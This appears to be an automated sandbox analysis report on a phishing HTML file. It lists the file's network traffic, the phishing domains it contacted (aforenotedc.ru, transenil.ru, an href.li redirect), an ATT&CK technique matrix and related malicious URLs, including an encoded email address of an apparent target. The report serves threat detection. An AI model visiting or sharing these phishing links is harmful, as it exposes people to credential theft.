Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/429523053:1727882942:AUCUgSR7kOf38UcLE0OuEHEx3RPGx3lhdnkziYW9qco/8cc5d8159ce5185d/77bf10bc9e9db0f HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2747sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 77bf10bc9e9db0fsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 15:49:47 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: EK8wCMkcTlmCWNUXnrCePBvbqbUoQnRQ5Co=$4D2Zm5iQQmyUWqPxServer: cloudflareCF-RAY: 8cc5d82a7f32de99-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 15:49:52 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: C7MB5jG+GDzU/SyAdfP5TeYAizGsAF6hsVk=$0hOIHa0pa3xlXDBhServer: cloudflareCF-RAY: 8cc5d84b9d81c481-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 15:50:06 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: HLIeyMSGeni+wLdfHMZJXhA4o+LyvMXN8UA=$6UXUN97Om8TwpcnCcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8cc5d89fdac4438c-EWR
Source: chromecache_83.5.drString found in binary or memory: https://9zg.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/
Source: chromecache_80.5.drString found in binary or memory: https://I8fgji.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: classification engineClassification label: mal72.phis.evad.winHTML@29/27@30/19
Source: 27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.htmlReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 --field-trial-handle=2500,i,7935428339012205260,6274500483146043326,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 --field-trial-handle=2500,i,7935428339012205260,6274500483146043326,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: file:///C:/Users/user/Desktop/27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html#c29udUBuc2RjaW5kaWEub3JnHTTP Parser: file:///C:/Users/user/Desktop/27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html#c29udUBuc2RjaW5kaWEub3Jn
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html16%ReversingLabsScript-JS.Trojan.Heuristic
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    unknown
    3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru
    188.114.97.3
    truefalse
      unknown
      code.jquery.com
      151.101.2.137
      truetrue
        unknown
        me-ycpi-cf-www.g06.yahoodns.net
        87.248.119.252
        truefalse
          unknown
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            unknown
            challenges.cloudflare.com
            104.18.95.41
            truefalse
              unknown
              www.google.com
              142.250.184.196
              truefalse
                unknown
                9zg.aforenotedc.ru
                172.67.214.183
                truetrue
                  unknown
                  yahoo.com
                  98.137.11.163
                  truefalse
                    unknown
                    href.li
                    192.0.78.27
                    truetrue
                      unknown
                      media-router-brb1.prod.media.g03.yahoodns.net
                      188.125.72.139
                      truefalse
                        unknown
                        windowsupdatebg.s.llnwi.net
                        46.228.146.0
                        truefalse
                          unknown
                          www.yahoo.com
                          unknown
                          unknownfalse
                            unknown
                            csp.yahoo.com
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/8r0fy/0x4AAAAAAAkN1ESGAmQEVKHM/auto/fbE/normal/auto/false
                                unknown
                                https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.jsfalse
                                  unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc5d8159ce5185d&lang=autofalse
                                    unknown
                                    https://href.li/?https://9zg.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/true
                                      unknown
                                      https://code.jquery.com/jquery-3.6.0.min.jstrue
                                      • URL Reputation: safe
                                      unknown
                                      https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://9zg.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/true
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/429523053:1727882942:AUCUgSR7kOf38UcLE0OuEHEx3RPGx3lhdnkziYW9qco/8cc5d8159ce5185d/77bf10bc9e9db0ffalse
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8cc5d8159ce5185d/1727884185699/6a8443e730cca91fcc019fa43e2caa5d910210e3641f376d94025e69ea631d9c/8lClcaSHEBS81wqfalse
                                            unknown
                                            https://3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ru/992955768393598TcoooKWMQFRRVTWFRRYLUCPRWPCDYMYFKPHJKQLEDFPAIMQBMIMJDUCSRfalse
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                unknown
                                                https://csp.yahoo.com/beacon/csp?src=ats&site=news&region=US&lang=en-US&device=desktop&yrid=6o9nr8tivmg0j&partner=false
                                                  unknown
                                                  file:///C:/Users/user/Desktop/27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html#c29udUBuc2RjaW5kaWEub3Jntrue
                                                    unknown
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cc5d8159ce5185d/1727884185696/IhqgAOPRuw5_jTLfalse
                                                      unknown
                                                      https://yahoo.com/false
                                                        unknown
                                                        https://www.yahoo.com/false
                                                          unknown
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://I8fgji.aforenotedc.ru/oBVboBDZoE8nn9Lnp8eBs/chromecache_80.5.drfalse
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.18.94.41
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            151.101.130.137
                                                            unknownUnited States
                                                            54113FASTLYUSfalse
                                                            87.248.119.252
                                                            me-ycpi-cf-www.g06.yahoodns.netUnited Kingdom
                                                            203220YAHOO-DEBDEfalse
                                                            172.67.214.183
                                                            9zg.aforenotedc.ruUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            104.17.24.14
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            142.250.184.196
                                                            www.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            104.18.95.41
                                                            challenges.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            192.0.78.27
                                                            href.liUnited States
                                                            2635AUTOMATTICUStrue
                                                            151.101.2.137
                                                            code.jquery.comUnited States
                                                            54113FASTLYUStrue
                                                            188.125.72.139
                                                            media-router-brb1.prod.media.g03.yahoodns.netUnited Kingdom
                                                            34010YAHOO-IRDGBfalse
                                                            239.255.255.250
                                                            unknownReserved
                                                            unknownunknownfalse
                                                            188.114.97.3
                                                            3bie4c8mhxoidlx9qnkhgzwaqkeeuqs4w0zy8igcwedso5x2pi2in4ndhf.transenil.ruEuropean Union
                                                            13335CLOUDFLARENETUSfalse
                                                            104.17.25.14
                                                            cdnjs.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            98.137.11.163
                                                            yahoo.comUnited States
                                                            36647YAHOO-GQ1USfalse
                                                            IP
                                                            192.168.2.4
                                                            192.168.2.23
                                                            192.168.2.13
                                                            192.168.2.15
                                                            192.168.2.14
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1524291
                                                            Start date and time:2024-10-02 17:48:18 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 5m 56s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:defaultwindowshtmlcookbook.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:9
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html
                                                            Detection:MAL
                                                            Classification:mal72.phis.evad.winHTML@29/27@30/19
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .html
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 172.217.18.3, 142.250.185.206, 142.251.168.84, 142.250.186.74, 34.104.35.123, 142.250.185.106, 142.250.185.234, 216.58.206.42, 142.250.185.202, 142.250.181.234, 142.250.186.138, 142.250.186.170, 172.217.18.10, 142.250.74.202, 172.217.16.138, 142.250.186.42, 172.217.16.202, 216.58.212.170, 142.250.186.106, 142.250.184.202, 142.250.184.234, 199.232.214.172, 142.250.185.67, 2.16.100.168, 88.221.110.91, 172.217.23.110, 93.184.221.240
                                                            • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, clients2.google.com, edgedl.me.gvt1.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, update.googleapis.com, hlb.apr-52dd2-0.edgecastdns.net, clients.l.google.com, wu-b-net.trafficmanager.net, optimizationguide-pa.googleapis.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: 27987136e29b3032ad40982c8b7c2e168112c9601e08da806119dcba615524b5.html
                                                            No simulations
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            87.248.119.252http://ertyuytcurrently.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                            • mail.yahoo.com/
                                                            https://njd.pages.dev/account/js-reporting/?crumb=uz4.07kerli&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                                            • help.yahoo.com/kb/account?redirect=true
                                                            104.18.94.41https://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2eGet hashmaliciousHTMLPhisherBrowse
                                                              http://view.flodesk.com/emails/66fd2053af85c99dd55d1461Get hashmaliciousUnknownBrowse
                                                                https://sportmansguilde.com/?https://www.office.comGet hashmaliciousUnknownBrowse
                                                                  Financial Overview.pdfGet hashmaliciousUnknownBrowse
                                                                    http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                                      https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                                                                        https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.noGet hashmaliciousHTMLPhisherBrowse
                                                                          https://email.mg.pmctraining.com/c/eJwUzDGOhSAQANDTSCfBAQQL2n-PgRmUDaAh_E329hvbVzwKpJF3Ehw2B84ro50WV0j68CYB2SNnQrVvLloHPjtLjAq9KAFAJ7thXDVQWlEdcfVg82oOBTo6s9ucFqPaKZ-W5sDSSz9lupuogbhPrBkT10n4ooxjgU8jXuDzfeqNJJ_rESP8fLGXiXJw6ddd6S3_GnaczPIep_gN8B8AAP__bcA-LwGet hashmaliciousHTMLPhisherBrowse
                                                                            https://42yr.rescindq.com/wqtyZAFZzF3hXgsogboKg/Get hashmaliciousTycoon2FABrowse
                                                                              Sales_Contract_Main_417053608_09.2024.pdfGet hashmaliciousUnknownBrowse
                                                                                151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                • code.jquery.com/jquery-1.11.3.min.js
                                                                                http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                • code.jquery.com/jquery-1.11.3.min.js
                                                                                http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                • code.jquery.com/jquery-1.7.min.js
                                                                                https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                                                • code.jquery.com/jquery-3.3.1.min.js
                                                                                http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                • code.jquery.com/jquery-1.7.2.min.js
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                cdnjs.cloudflare.comhttps://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2eGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.24.14
                                                                                https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.24.14
                                                                                Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                                                                • 104.17.25.14
                                                                                https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.noGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.24.14
                                                                                http://klasstackle.com/lfL15Q57vu4UGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.24.14
                                                                                https://email.mg.pmctraining.com/c/eJwUzDGOhSAQANDTSCfBAQQL2n-PgRmUDaAh_E329hvbVzwKpJF3Ehw2B84ro50WV0j68CYB2SNnQrVvLloHPjtLjAq9KAFAJ7thXDVQWlEdcfVg82oOBTo6s9ucFqPaKZ-W5sDSSz9lupuogbhPrBkT10n4ooxjgU8jXuDzfeqNJJ_rESP8fLGXiXJw6ddd6S3_GnaczPIep_gN8B8AAP__bcA-LwGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                https://42yr.rescindq.com/wqtyZAFZzF3hXgsogboKg/Get hashmaliciousTycoon2FABrowse
                                                                                • 104.17.25.14
                                                                                Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                                                                • 104.17.24.14
                                                                                Play_VM-Now(Tina.lawvey)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                challenges.cloudflare.comhttps://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2eGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.18.95.41
                                                                                http://view.flodesk.com/emails/66fd2053af85c99dd55d1461Get hashmaliciousUnknownBrowse
                                                                                • 104.18.94.41
                                                                                https://sportmansguilde.com/?https://www.office.comGet hashmaliciousUnknownBrowse
                                                                                • 104.18.95.41
                                                                                https://orv-moers.powerappsportals.com/Get hashmaliciousHtmlDropperBrowse
                                                                                • 104.18.95.41
                                                                                Financial Overview.pdfGet hashmaliciousUnknownBrowse
                                                                                • 104.18.94.41
                                                                                http://Asm.alcateia.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.18.94.41
                                                                                https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                                                                                • 104.18.94.41
                                                                                https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.noGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.18.95.41
                                                                                https://email.mg.pmctraining.com/c/eJwUzDGOhSAQANDTSCfBAQQL2n-PgRmUDaAh_E329hvbVzwKpJF3Ehw2B84ro50WV0j68CYB2SNnQrVvLloHPjtLjAq9KAFAJ7thXDVQWlEdcfVg82oOBTo6s9ucFqPaKZ-W5sDSSz9lupuogbhPrBkT10n4ooxjgU8jXuDzfeqNJJ_rESP8fLGXiXJw6ddd6S3_GnaczPIep_gN8B8AAP__bcA-LwGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.18.94.41
                                                                                https://42yr.rescindq.com/wqtyZAFZzF3hXgsogboKg/Get hashmaliciousTycoon2FABrowse
                                                                                • 104.18.94.41
                                                                                code.jquery.comhttps://tqaun.us12.list-manage.com/track/click?u=fb0a5f04fa3c936488ff652c3&id=d22699c399&e=ce0a629e2eGet hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.194.137
                                                                                http://view.flodesk.com/emails/66fd2053af85c99dd55d1461Get hashmaliciousUnknownBrowse
                                                                                • 151.101.130.137
                                                                                https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                                                                                • 151.101.130.137
